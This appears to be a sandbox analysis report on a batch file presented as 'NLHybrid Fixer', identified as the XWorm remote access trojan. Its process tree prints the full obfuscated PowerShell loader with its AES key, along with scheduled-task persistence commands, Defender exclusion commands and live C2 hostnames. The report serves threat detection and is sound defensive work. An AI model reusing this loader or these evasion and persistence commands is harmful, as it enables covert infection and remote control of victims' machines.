Overview

overview

10

Static

static

1

NLHybrid Fixer.bat

windows10-ltsc 2021-x64

10

NLHybrid Fixer.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    1782s
  • max time network
    1155s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-11-2024 06:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NLHybrid Fixer.bat

  • Size

    291KB

  • MD5

    734fdc5c211a7b1fe3a5101c3b0aafd6

  • SHA1

    3d8b84678e674a5b4b49ad4ee4669179d16b75d0

  • SHA256

    0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

  • SHA512

    92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

  • SSDEEP

    6144:uoiULBMXvSD+eFkX0TupDOYvaktWHHvdTNb71M943xw:uLULBM47FNuNOWaxvH7m43a

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

remote-newest.gl.at.ply.gg:62113

fund-scared.gl.at.ply.gg:62113
Mutex

UrM5eoX12ULh6st6

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    win64updater.exe

aes.plain

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 58 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 44 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:6140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:224
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_675_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_675.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1700
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_675.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:6060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_675.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_675.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_675.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe
              "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe"
              6⤵
              • Executes dropped EXE
              PID:1820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:392
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4984
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5432
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "win64updater" /tr "C:\Users\Admin\win64updater.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1032
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "win64updater"
              6⤵
                PID:4308
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2D06.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5576
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:3764
    • C:\Windows\system32\sihost.exe
      sihost.exe
      1⤵
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\explorer.exe
        explorer.exe /LOADSAVEDWINDOWS
        2⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:2932
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:340
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
      1⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      43ad82ca3274b72e28dc2d04c3046121

      SHA1

      80a42ea602f8d099875b5db8842b5279985b473e

      SHA256

      0cd0a6b663fe01f35131d05f397d50acfbcf96e739fd5ee6cd6c9d0830a12766

      SHA512

      ab0348ecbb9c50960a2648304e51640cc28b63d7680d842b59448f58e093a39ba4bb1a0760d32365bc82ac456e1a6a26e0ce69ded3bbf2fe3755ab7ae2e6d8dd

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4b86e1a9a1b724c301725579ce442d5e

      SHA1

      971d09bd61f83b5371c9bab1d5b879b714f5799a

      SHA256

      8ef66efbcdc121e86d296c2c4569893799a9fc2e24817268a4e612247ff0a5ca

      SHA512

      71b5e4152d708e1d89de954194d2b6d6d0c93a0c2e4b677cd8e15c569885c9b4a6a196852176e44647f7ca29e8e67cccb848961b5fba1326f997ef18a719f303

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      59d37a8c588c83e806678c7fb5d1229f

      SHA1

      4396d68567f30f08e08a269802fe3f4784b88c5b

      SHA256

      c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

      SHA512

      19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      05b3cd21c1ec02f04caba773186ee8d0

      SHA1

      39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

      SHA256

      911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

      SHA512

      e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      4397b0d1a82fec8a95f1ab53c152c5a5

      SHA1

      3632ed4f2b65fd0df29b3d3725e3a611d2e1adf7

      SHA256

      10cece13749ac090c815e53dc5e248b4b9c3ba93dc3d434d97d22f12a3906734

      SHA512

      f0d21ab75d08e1cb4ac83507f9ca41ef5365027b0d7e27747ded44b76fdb0346ca2d7499697802c5b67696e0c73716fcfab698825a143515151001690804d59f

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NTU84VM\www.bing[1].xml
      Filesize

      17KB

      MD5

      a935ae0880d304d4d1577e8a6bafa91f

      SHA1

      779785719e328f0a8240a63579a2a65dab78331f

      SHA256

      4796730a7b290acbe68b998de293cfc94e62e3e58dff72331ed77323dff30ecc

      SHA512

      6ae124492b913f6acc3734883fbc446c64ff434f76059fcbb6c7bdc38fb073ddb6ea7f6e4c1aaf1e8b32bb6391028b08fbbc1ddf9ea2cb237930524f1a40324d

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NTU84VM\www.bing[1].xml
      Filesize

      15KB

      MD5

      bca5ea8c3d0e4480defffadd44444022

      SHA1

      27f329f669c8e726f6603366b2108288a00190ae

      SHA256

      cf28ff3651efb21556cfe276cc31fa5fcade01ada1e6a39a120ba4edb68541bc

      SHA512

      892f4d64ea201341e5172c075b87675974291c3bb5048b7fb99e9f381a8bbdc3a4d4335dc82148bc278cfd58202151daafbecb16c70f0685ec661f6e73cd0997

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe
      Filesize

      42KB

      MD5

      269085c7755574a5cd840b298a0b4a55

      SHA1

      3b20a9f3c0e5ed34d37c5c915c07fd93da7d7cbd

      SHA256

      ee94f31406ba029502b3737f9d2c2d2d22448643deaa3095239a55b58b9169c8

      SHA512

      47b5782e53cf03bb5eb8f96584b9e0608bc10038b8721761bf67af75ed0b77a2e51ef94a9d62302e6e0d45885e72d47b80815caa8c063a616d50b646885b5f65

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jc2qfmf.gwp.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp2D06.tmp.bat
      Filesize

      171B

      MD5

      4d6a27452d8050d1ca910525357fe212

      SHA1

      745c9e9f77d888b323ded0fa17dbbc056089966f

      SHA256

      0bcc3460724246090263527745e3cb50340cff7fa831e739c435a78c42cc199d

      SHA512

      de09800de28358cde68ccf4609f08d168c15f940e771bc4f2a3b95f80a27826c7eb8346040f10b8a2ffc652dd9feb945b64bd15a999140562421375f9c8c364e

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_675.bat
      Filesize

      291KB

      MD5

      734fdc5c211a7b1fe3a5101c3b0aafd6

      SHA1

      3d8b84678e674a5b4b49ad4ee4669179d16b75d0

      SHA256

      0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

      SHA512

      92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_675.vbs
      Filesize

      115B

      MD5

      a6b8621a58566d89d4baf39dfa89ee51

      SHA1

      211f69e1aaa7545b66dfcc3443c44cb47ad82183

      SHA256

      ab78978b0e9d52d2e014fafcb4cdc0ff1f8f1ac368aa66c437facd5ee32c6763

      SHA512

      2d0cff3fb9bd3b1472acb69d47066d2dbab76891d229cd8047a2e6aeef480fadb689cfe57e1b72d6807deaac17a937127f7d6bdecd570d1a229409ebc3cf76ce

      Download Submit

    • memory/224-63-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/224-62-0x00007FF8EE573000-0x00007FF8EE575000-memory.dmp

      Filesize

      8KB

      Download

    • memory/224-11-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/224-0-0x00007FF8EE573000-0x00007FF8EE575000-memory.dmp

      Filesize

      8KB

      Download

    • memory/224-9-0x0000012D9B820000-0x0000012D9B842000-memory.dmp

      Filesize

      136KB

      Download

    • memory/224-12-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/224-10-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/224-13-0x0000012D9B7F0000-0x0000012D9B7F8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/224-14-0x0000012D9BAD0000-0x0000012D9BB0E000-memory.dmp

      Filesize

      248KB

      Download

    • memory/1700-16-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1700-30-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1700-26-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1700-22-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1700-27-0x00007FF8EE570000-0x00007FF8EF032000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1776-217-0x00000273FEA10000-0x00000273FEA30000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1776-218-0x00000273FEBE0000-0x00000273FECE0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1776-254-0x00000273FE9D0000-0x00000273FE9F0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1776-342-0x0000026BB22D0000-0x0000026BB23D0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1820-61-0x00000000003C0000-0x00000000003D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2864-50-0x000001A3E72B0000-0x000001A3E72C0000-memory.dmp

      Filesize

      64KB

      Download